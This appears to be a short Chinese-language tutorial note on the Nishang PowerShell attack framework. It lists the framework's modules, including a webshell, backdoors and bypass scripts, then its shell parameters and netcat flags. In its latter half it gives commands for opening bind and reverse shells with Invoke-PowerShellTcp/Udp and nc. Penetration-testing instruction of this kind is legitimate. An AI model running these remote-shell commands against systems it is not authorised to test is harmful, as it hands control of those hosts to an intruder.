目录
Nishang是一个PowerShell攻击框架,它是Powershell攻击脚本和有效载荷的一个集合,Nishang被广泛应用于渗透测试的各个阶段
NiShang目录介绍
ActiveDirectory:活动目录
Antak-Webshell:在内存中执行PowerShell脚本,运行命令,并使用此Webshell下载和上传文件
Backdoors:一个后门,可以从第三方网站接收指令,并在内存中执行PowerShell脚本
Bypass:实施公告已知方法来绕过
Client:客户端
Escalationl:当需要权限时提取
Executionl:命令执行RCE
Gatherl信息收集
MITE:用于MITM攻击的本地HTTOS代理
Misc:脚本
Piovt:跳板
Prasadhak:对照VirusTotal数据库检查正在进行的进程的运行哈希
Scan:扫描
Shells:shell
Utility:杂项
Powerpreter:Meterpreter会话
Nishang参数
-IPAddress方向连接时需要连接到的IP地址
-Port反向连接时是需要连接到的端口,选择-Bind选项时是需要监听端口
-Reverse反向连接
-Bind正向连接用到的端口监听
NC参数
-n 直接使用ip地址,而不通过域名服务器
-v 显示指令执行过程
-l 使用监听模式 管控传入的资料 (适合反向连接)
-p 设置本地主机使用的通信端口
Invoke-PowerShellTcp是PowerShell交互式正向或反向连接shell
靶机执行:./Invoke-PowerShellTcp.ps1 Invoke-PowerShellTcp -Bind -Port 6666
在攻击机上使用nc工具正向连接目标主机
攻击机:nc -nv <Inovke-Powershell开启交互式的靶机ip> 6666
靶机执行:./Invoke-PowerShellUdp -Reverse -IPAddress <攻击机的ip> -port 555
在攻击机使用nc工具反向连接目标主机
攻击机:nc -luvp 555